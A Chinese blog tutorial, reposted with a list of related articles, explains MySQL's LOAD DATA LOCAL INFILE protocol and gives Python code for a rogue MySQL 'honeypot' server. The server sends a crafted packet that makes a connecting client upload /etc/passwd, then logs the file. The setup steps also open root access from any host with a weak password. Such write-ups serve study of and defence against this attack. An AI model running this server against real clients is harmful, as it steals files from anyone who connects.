Python实现MYSQL蜜罐

1 LOAD DATA INFILE介绍   

首先开启一个Mysql,看一下mysql是如何读取主机文件的。

1.1 linux搭建mysql  

1)docker运行mysql                                                                           

图片

2)启动Mysql

docker run -itd --name mysql -p 3306:3306 -e MYSQL_ROOT_PASSWORD=123456 mysql

图片

3)进入容器,连接docker

图片

4)开启远程访问

mysql> GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
Query OK, 0 rows affected, 1 warning (0.00 sec)
mysql> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.00 sec)

图片

修改配置文件,监听所有地址

/etc/mysql/mysql.conf.d/mysqld.cnf

图片

1.2 其他windows连接mysql  

图片

1.3 开启local_infile  

set global local_infile=1;

图片

1.4 测试文件读取   

load data local infile 'C:/1.txt' into table test fields terminated by '\n'

成功读取到文件

图片

2 wireshark分析交互过程  

通过wireshark,可以看到Client登入数据库与执行SQL命令时,Client与Server交互的命令。

1)服务端 greeting

图片

2)客户端 login request

图片

3)服务端 resposne

图片

4)读取文件的对应关系——客户端发起请求

图片

5)读取文件的对应关系——服务端同意请求

图片

综上可知:在Client向Server发起查询后,Server会返回一个Response TABULAR的响应包。而如果在这个数据包中指定文件路径,就可以读取Client相应的文件。

实际上Server可以在回复任何Client端的请求时返回Response TABULAR响应包,而不仅仅是在Client发起Load data local infile后。      

服务端同意请求文件的Response TABULAR数据包部分内容如下:​​​​​​​

09 #文件名长度+100 00 01 #数据包序号fb #数据包类型43 3a 2f 31 2e 74 78 74 #文件名

3 python实现mysql蜜罐  

大致编码实现如下:

  • 创建socket服务端监听(IP,PORT),一般是3306端口

  • 服务端接收到连接请求后进行数据交互

1)模拟服务器发送greeting信息​​​​​​​

server_version = b"\x0a\x35\x2e\x37\x2e\x32\x35"
conn.sendall(b"\x4a\x00\x00\x00" + server_version + b"\x00\x0c\x00\x00\x00\x6d\x7b\x54\x0f\x53\x0d\x3a\x3f\x00\xff\xff\xe0\x02\x00\xff\xc1\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x40\x52\x44\x1e\x2c\x26\x34\x0f\x2c\x68\x6e\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
conn.recv(9999)

2)模拟服务器发送成功连接信息​​​​​​​

conn.sendall(b"\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
conn.recv(999)

3)模拟服务器发送服务文件信息​​​​​​​

filename = "/etc/passwd"
wantfile = str.encode(chr(len(filename)+1)) + b"\x00\x00\x01\xfb" + str.encode(filename)
conn.sendall(wantfile)
content = conn.recv(9999)
if len(content) > 10:           with open(logpath + "/" + filename.replace("/", "_").replace(":", "")+".txt" ,"w") as txt:txt.write(content.decode('utf-8','ignore'))print(f"文件内容读取完成")

整体效果如下:

1)使用介绍

图片

2)客户端启动

图片

3)服务端监听

图片

4)读取文件时的效果

图片

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/84755.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【GO】网络请求例子

【GO】网络请求例子

post请求;multipart/form-data类型 // 构建请求参数requestData : map[string]interface{}{"gb": "","code": "","reMemberInfo": map[string]interface{}{"shi": "","…
阅读更多...
【开发工具】idea 的全局搜索快捷键(Ctrl+shift+F)失效

【开发工具】idea 的全局搜索快捷键(Ctrl+shift+F)失效

文章目录 前言1. 取消 输入法的快捷键(推荐使用)2.更改 idea的快捷键3. 热键占用总结 前言 当你发现在idea 中看到用于全局搜索的快捷键就是 CtrlshiftF,可是怎么按都不管用的时候,你就不要再执着于自己的操作继续狂点电脑按键了…
阅读更多...
Lnmp架构之mysql数据库实战1

Lnmp架构之mysql数据库实战1

1、mysql数据库编译 编译成功 2、mysql数据库初始化 配置数据目录 全局文件修改内容 生成初始化密码并进行初始化设定 3、mysql主从复制 什么是mysql的主从复制? MySQL的主从复制是一种常见的数据库复制技术,用于将一个数据库服务器(称为主…
阅读更多...
python3读写dbf文件

python3读写dbf文件

目录 1 读dbf文件2 写dbf文件 1 读dbf文件 import dbf# 打开dbf文件 table dbf.Table(阿坝藏族羌族自治州_BXF_CHA.dbf)# 打开文件并进行读写操作 table.open(modedbf.READ_WRITE)# 遍历记录并更新字段值 res [] with table:for record in table:res.append(list(record))# …
阅读更多...
解决Permission is not allowed后基于Ubuntu23.04安装配置docker与docker-compose

解决Permission is not allowed后基于Ubuntu23.04安装配置docker与docker-compose

参考:Docker官网-Install Docker Engine on Ubuntu 虚拟机里安装ubuntu-23.04-beta-desktop-amd64,开启SSH(换源、备份),配置中文以及中文输入法等 基于CentOS7安装配置docker与docker-compose 一、 Install using the Apt repository 1.…
阅读更多...
线性代数的本质(七)——特征值和特征向量

线性代数的本质(七)——特征值和特征向量

特征值和特征向量 本章特征值和特征向量的概念只在方阵的范畴内探讨。 相似矩阵 Grant:线性变换对应的矩阵依赖于所选择的基。 一般情况下,同一个线性变换在不同基下的矩阵不同。仍然以平面线性变换为例,Grant 选用标准坐标系下的基向量 i…
阅读更多...
conda环境下XZ_5.1.2alpha not found解决方案

conda环境下XZ_5.1.2alpha not found解决方案

1 问题描述 yum install cmake 使用yum安装cmake失败,失败信息如下: [rootlocalhost]# yum install cmake There was a problem importing one of the Python modules required to run yum. The error leading to this problem was:/root/anaconda3/li…
阅读更多...
blog--4美化主题

blog--4美化主题

配置/美化 bug 把你的网站名/themes/hugo-theme-stack/exampleSite/目录下的config.yaml复制到网站根目录(也就是你的网站名这个目录)删除网站根目录的config.toml stack主题不需要这个配置文件打开网站根目录下的config.yaml进行填空博主头像放在/themes/hugo-theme-stack/a…
阅读更多...
ansible下使用blockinfile添加配置信息到xml

ansible下使用blockinfile添加配置信息到xml

#发文福利# 一、前言 1、目标&#xff1a;批量修改服务器上的xml配置文件 2、原配置文件的最后一部分内容如下 [roots40 tmp]# tail kahn.conf<value>nginx</value><description>my nginx config!</description> </property><property>…
阅读更多...
fastjson远程命令执行

fastjson远程命令执行

fastjson远程代码执行 漏洞原因&#xff1a;fastjson在对json字符串反序列化的时候&#xff0c;会读取到type的内容&#xff0c;将json内容反序列化为java对象并调用这个类的setter方法。 1、搭建rmi服务 直接利用jndi-exploit工具 2、抓包改为POST。开启nc监听、发包 PO…
阅读更多...
python经典百题之求数字位数及逆序打印

python经典百题之求数字位数及逆序打印

题目&#xff1a;给一个不多于5位的正整数&#xff0c;要求&#xff1a;一、求它是几位数&#xff0c;二、逆序打印出各位数字 程序分析 我们需要编写一个程序&#xff0c;能够接受不多于5位的正整数&#xff0c;然后分析其位数&#xff0c;并逆序打印出各位数字。可以利用取…
阅读更多...
前端面试题整理

前端面试题整理

1.沙箱隔离 前端沙箱隔离&#xff08;Frontend sandbox isolation&#xff09;是一种安全机制&#xff0c;用于将前端代码与主机环境隔离开来&#xff0c;以保护系统的安全性和稳定性。 在Web开发中&#xff0c;前端代码通常由JavaScript编写&#xff0c;而JavaScript是一种强…
阅读更多...
Centos7 自部署中间件开机启动,以及java应用开机启动方法

Centos7 自部署中间件开机启动,以及java应用开机启动方法

一、zookeeper cd /etc/rc.d/init.d/ touch zookeeper chmod x zookeeper vi zookeeper#以下为内容&#xff0c;自行修改 路径#!/bin/bash ##chkconfig:2345 10 90#description:service zookeeper #修改为自己的目录 export ZOO_LOG_DIR/data/apache-zookeeper-3.7.0/logs…
阅读更多...
贸易战的影响:跨境电商的“黑洞”风险与机遇

贸易战的影响:跨境电商的“黑洞”风险与机遇

当今全球贸易局势充满了不确定性和动荡。贸易战的阴云笼罩下&#xff0c;跨境电商企业面临着前所未有的挑战&#xff0c;但与此同时&#xff0c;也蕴藏着巨大的机遇。本文将深入探讨贸易战对跨境电商的影响&#xff0c;以及企业在这个新现实中如何应对风险并寻找机遇。 贸易战的…
阅读更多...
快手商品详情数据API接口【关键词搜索商品列表数据】APP端商品详情数据

快手商品详情数据API接口【关键词搜索商品列表数据】APP端商品详情数据

快手商品API接口是快手电商平台为开发者提供的一组接口&#xff0c;允许开发者通过程序代码访问快手电商平台的商品数据&#xff0c;实现商品信息的获取等操作。以下是快手商品API接口的一些常用功能&#xff1a; 获取商品列表&#xff1a;通过该接口可以获取店铺或分类下的商…
阅读更多...
npm常用命令系统介绍

npm常用命令系统介绍

npm常用命令系统介绍 npm helpnpm initpackage.json 文件package.json 文件属性说明默认 package.json 文件--参数[-yes|-y]设置 package.json 中字段的默认值package-lock.json 文件 npm [config|c]设置源 npm [install|i]可选参数&#xff1a;全局安装的特性 包的删除npm uni…
阅读更多...
Vue3 - 实现动态获取菜单路由和按钮权限控制指令

Vue3 - 实现动态获取菜单路由和按钮权限控制指令

GitHub Demo 地址 在线预览 前言 关于动态获取路由已在这里给出方案 Vue - vue-admin-template模板项目改造&#xff1a;动态获取菜单路由 这里是在此基础上升级成vue3和ts&#xff0c;数据和网络请求是通过mock实现的 具体代码请看demo!!! 本地权限控制&#xff0c;具体是通过…
阅读更多...
(总目录)springboot - 实现zip文件上传并对zip文件解压, 包含上传oss

(总目录)springboot - 实现zip文件上传并对zip文件解压, 包含上传oss

全文目录,一步到位 1.本文概述1.1 本文简介 2. 功能实现2.1 统一文件校验2.2 普通(多)文件上传[服务器]2.2.1 controller层2.2.2 service层2.2.3 业务impl实现类2.2.4 FileIOUtils工具包代码 2.3 zip文件的解压2.4 图片文件的压缩2.5 oss文件后端上传2.6 oss文件前端上传2.7 后…
阅读更多...
matlab读写json文件

matlab读写json文件

Background 通常&#xff0c;在matlab中使用mat文件进行数据存储。MAT文件是MATLAB中用来存储数据的二进制文件格式。MAT文件可以包含各种数据类型&#xff0c;包括数字、矩阵、向量、结构体、字符和函数等。但是&#xff0c;当和其他语言有交互时&#xff0c;mat文件会不太方便…
阅读更多...
golang实现远程控制主机

golang实现远程控制主机

文章目录 ssh原理使用golang远程下发命令使用golang远程传输文件 ssh原理 说到ssh原理个人觉得解释最全的一张图是这张华为画的 Connection establishment 这一步就是建立tcp连接 version negotiation 这一步是ssh客户端(连接者)和被ssh服务端(连接者)进行协议的交换&#xf…
阅读更多...
最新文章

Copyright @ 2022~2023